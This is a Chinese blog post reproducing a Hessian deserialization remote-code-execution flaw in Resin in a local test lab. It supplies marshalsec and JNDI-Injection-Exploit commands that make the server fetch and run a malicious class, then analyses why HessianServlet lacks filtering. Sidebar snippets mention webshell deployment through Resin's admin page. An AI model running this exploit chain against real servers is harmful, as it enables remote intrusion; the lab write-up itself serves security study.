rmi反序列化导致rce漏洞修复_Resin payload复现Hessian反序列化RCE漏洞

最新推荐文章于 2024-06-20 22:49:58 发布
最新推荐文章于 2024-06-20 22:49:58 发布
阅读量448 收藏
点赞数
文章标签: rmi反序列化导致rce漏洞修复
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28988985/article/details/112892401
版权
本文介绍了如何复现Resin服务器由于Hessian反序列化导致的远程代码执行(RCE)漏洞。首先,搭建了测试环境,并启动JNDI利用工具。接着,通过marshalsec生成payload,并将其发送到Resin服务器。分析发现HessianServlet没有过滤机制,从而导致漏洞。最后,展示了利用hessian.py构造请求数据包并触发RCE的过程。
摘要由CSDN通过智能技术生成

一,搭建测试环境

测试环境使用最新的jar包

将HessianTest.war放在tomcat / webapp /下,然后启动tomcat

访问服务器并返回到以下页面以指示环境正常

二,启动JNDI利用工具

编译后,JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

执行命令:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc.exe -A 127.0.0.1

-C是要执行的命令-A是侦听地址

三,生成payload

编译后的marshalsec-0.0.3-SNAPSHOT-all.jar

执行命令:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Resin http://127.0.0.1:8180/ ExecTemplateJDK7>hession

将在当前目录生成hession的payload

四,将有效载荷发送到粗麻布服务器

使用hessian.py将序列化的有效负载发送到服务器

执行订单:

python hessian.py -u http://127.0.0.1:8080/HessianTest/hessian -p hessian

您可以看到服务器已转到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar以下载恶意类并执行弹出计算器

五,分析

使用hession的Web项目需要配置web.xml并映射com.caucho.hessian.server.HessianServlet的对应路径

Java客户端可以轻松地调用服务器上的方法,如下所示

查看com.caucho.hessian.server.HessianServlet的代码

服务方法处理来自客户端的http请求并调用

调用HessianSkeleton的invoke方法从客户端发送的数据流中读取对象

看到代码中没有黑白名单过滤机制

通过抓取请求数据包,分析和构建请求数据包,将由marshalsec工具生成的Resion有效负载发送到服务器

这是构造请求数据包的hessian.py代码

请求包

深渊号角~~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【安全漏洞Resin解析漏洞分析
HBohan的博客
11-05 2538
前言 前阵子看有师傅在公众号上发表了Resin解析漏洞分析,我们也知道有个常用的OA用的就是Resin,因此我认为了解它的漏洞是十分必要的。 【学习资料】 原理分析 这个漏洞和IIS解析漏洞比较像,可以通过创建一个xxx.jsp的文件夹,并在其中放置一个txt文件,文件的内容将会被当作JSP解析。 我认为要分析这个漏洞原理,首先得先了解访问jsp文件时Resin是如何处理我们请求的。 首先看下*.jsp是被哪个Servlet处理的,从配置app- default.xml中可以看出,我们的请求会被com.ca
Java序列化反序列化原理及漏洞解决方案
08-18
Java序列化反序列化原理及漏洞解决方案 Java序列化反序列化原理及漏洞解决方案是Java编程语言中的一项重要机制,该机制允许将Java对象转换为字节序列,以便在网络上传输或存储在文件中。同时,Java也提供了反序列化...
resin启动一个bug的解决
restart
01-23 3221
这个bug的问题后来被确认为Resin所在目录层有中文目录名。 -------------------------------------------------------------------------------------------------------------------------- java.lang.NullPointerException  at com.cau
web中间件漏洞-Resin漏洞-密码爆破、上传war
最新发布
Alsn86的博客
06-20 287
想部署webshell,得使用SSL方式请求,访问https://192.168.1.2:8443/resin-admin/index.php?q=deploy&s=0(注:如果使用最新的火狐浏览器或者谷歌浏览器访问时可能会出现证书错误阻止访问,建议使用IE浏览器或者降低浏览器版本进行访问)。上传webshell,部署war文件,浏览选择C:\工具\resin\ma.war,点击Deploy。部署完成,访问即可xxx.xxx.xxx.xxx/ma/ma.jsp。
java rmi反序列化安全漏洞问题解决方案
limingdepoxiao的博客
06-25 2350
解决方案 1、关闭javarmi服务的端口在公网的开放; 2、下载SerialKiller临时补丁,这个jar后放置于classpath,将应用代码中的java.io.ObjectInputStream替换为SerialKiller,之后配置让其能够允许或禁用一些存在问题的类,SerialKiller有Hot-Reload,Whitelisting,Blacklisting几个特性,控制了外部输入反序列化后的可信类型 例如:采用下载SerialKiller补丁,将IDoc2PdfUtilServic.
rmi反序列化导致rce漏洞修复_JAVA反序列化漏洞解决办法
weixin_39527911的博客
12-23 484
一、漏洞描述:近期,反序列化任意代码执行漏洞持续发酵,越来越多的系统被爆出存在此漏洞。Apache Commons工具集广泛应用于JAVA技术平台,存在Apache Commons Components InvokerTransformer反序列化任意代码执行漏洞, WebLogic、IBM WebSphere、JBoss、Jenkins和OpenNMS等应用都大量调用了Commons工具集,通过...
oracle 序列_Oracle WebLogic最新高危反序列化漏洞修复方法
weixin_39782573的博客
11-25 385
漏洞说明在 WebLogic 里,InboundMsgAbbrev中的resolveProxyClass是可以对rmi的类型进行处理的,但是只简单判断了java.rmi.registry.Registry,为攻击者提供了绕过黑名单的机会,攻击者可以通过使用其他的rmi来绕过Weblogic的黑名单限制。除此之外,java远程方法协议会序列化一个RemoteObjectInvocationHandl...
Java序列化和反序列化_动力节点Java学院整理
08-30
2. 网络通信:在网络传输过程中,对象需要被转化为字节流,然后在接收端再反序列化回对象,这对于分布式系统和远程方法调用(RMI)尤为重要。 在Java中,实现序列化的途径是让类实现`Serializable`接口。例如,以下...
Java对象的序列化与反序列化Java开发Java经验技巧
11-22
- **反序列化攻击**:恶意用户可能会构造特殊的数据流,导致反序列化时执行任意代码,因此在反序列化时要格外小心,避免使用不可信的数据源。 - **防御措施**:使用安全的反序列化库,或者在反序列化前对数据进行...
java反序列化利用程序UI版Beta1.1.rar
07-20
3. **RMI(远程方法调用)与反序列化**:Java的RMI机制在通信过程中使用了反序列化,攻击者可以通过操纵RMI请求来触发反序列化漏洞。 4. **反射与构造恶意对象**:攻击者可以利用Java的反射API创建和控制反序列化...
java反序列化工具
11-21
然而,这个过程也可能引入安全风险,因为不安全的反序列化可能导致远程代码执行(RCE漏洞。 在给定的标题和描述中,提到了几个关键的服务器端应用平台:JBoss、WebLogic和WebSphere。这些都是流行的Java企业级...
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
resin-4.0.27-pro 破解包
08-18
覆盖pro.jar到 resin-4.0.27-pro/lib目录下。版本号必须保证完全一致。
ChromeRce:2021年4月15日出现的Chrome payload
04-16
Chrome Rce Payload 文件在payload.html中
resin-pro-3.1.8破解版
09-19
下载了别人的包和破解license文件合成。但有无替换,均可以正常启动,并访问主页。
Resin 3.1.8在64位Windows 2003下 isapi_srun.dll 的BUG
KimSoft's Blog
11-22 3220
一直用iis6+resin3.1.8部署应用,近期一个项目使用64位的windows2003,resin3.1.8跑起来没有任何问题,但一和iis结合,访问就出问题。 访问了一下caucho-status,发现版本竟是3.1.6,看来resin3.1.8的win64目录下的isapi_srun.dll没有升级到3.1.8。没有办法,还好3.1.9出来,升级了一下,成功!
Resin任意文件读取漏洞
weixin_30363509的博客
04-26 7204
Resin是什么 虽然看不上但是还是原因下百度百科: Resin是CAUCHO公司的产品,是一个非常流行的支持servlets和jsp的引擎,速度非常快。Resin本身包含了一个支持HTTP/1.1的WEB服务器。它不仅可以显示动态内容,而且它显示静态内容的能力也非常强,速度直逼APACHESERVER。许多站点都是使用该WEB服务器构建的。 可以认为是一个WEB服务器 Resin存在任意文件读...
RMI反序列化漏洞分析
蚁景网安学院
08-15 453
RMI简介首先看一下RMI在wikipedia上的描述:Java远程方法调用,即JavaRMI(JavaRemote MethodInvocation)是Java编程语言里,一种用于实现...
Resin多个远程信息泄露漏洞
战斗机
06-17 1293
Caucho Resin多个远程信息泄露漏洞 由于我工作的原因使用resin比较多,因为最近服务器因为这个漏洞被黑了,所以希望各个站长警惕起来,因为我发现使用resin的大站也不少例如17173还有pchome等,经过我的测试都有漏洞,虽然漏洞只能看源代码但是谁也不想自己辛苦写的东西给别人看吧。强烈支持使用resin的人打上补丁 Resin是一款由Caucho Technology...
rmi远程反序列化rce漏洞_Spring框架的反序列化远程代码执行漏洞分析(转)
06-06
好的,我知道你的问题了。针对你提到的这个问题,我可以给你一些解释和分析。 首先,RMI(Remote Method Invocation)是Java远程调用机制的一种实现方式,它允许在不同的JVM进程之间进行Java对象的传输和远程调用。而反序列化(Deserialization)是将二进制数据转换为Java对象的过程。在Java中,对象的序列化和反序列化是通过ObjectInputStream和ObjectOutputStream类来实现的。 RMI远程反序列化RCE漏洞是指,攻击者可以通过构造恶意的序列化数据,使得服务端在反序列化时执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的根本原因在于Java序列化机制的设计缺陷,攻击者可以通过构造恶意的序列化数据来绕过Java的安全机制,从而执行任意代码。 而Spring框架的反序列化远程代码执行漏洞,则是指攻击者可以通过构造恶意的序列化数据,使得Spring框架在反序列化时执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的影响范围非常广泛,涵盖了Spring框架的多个版本,包括Spring MVC、Spring WebFlow、Spring Data等。 总的来说,RMI远程反序列化RCE漏洞和Spring框架的反序列化远程代码执行漏洞都是Java序列化机制的设计缺陷所导致的安全漏洞。攻击者可以通过构造恶意的序列化数据来绕过Java的安全机制,从而执行任意代码。因此,在开发Java应用程序时,需要注意对序列化和反序列化数据的处理,避免出现安全漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值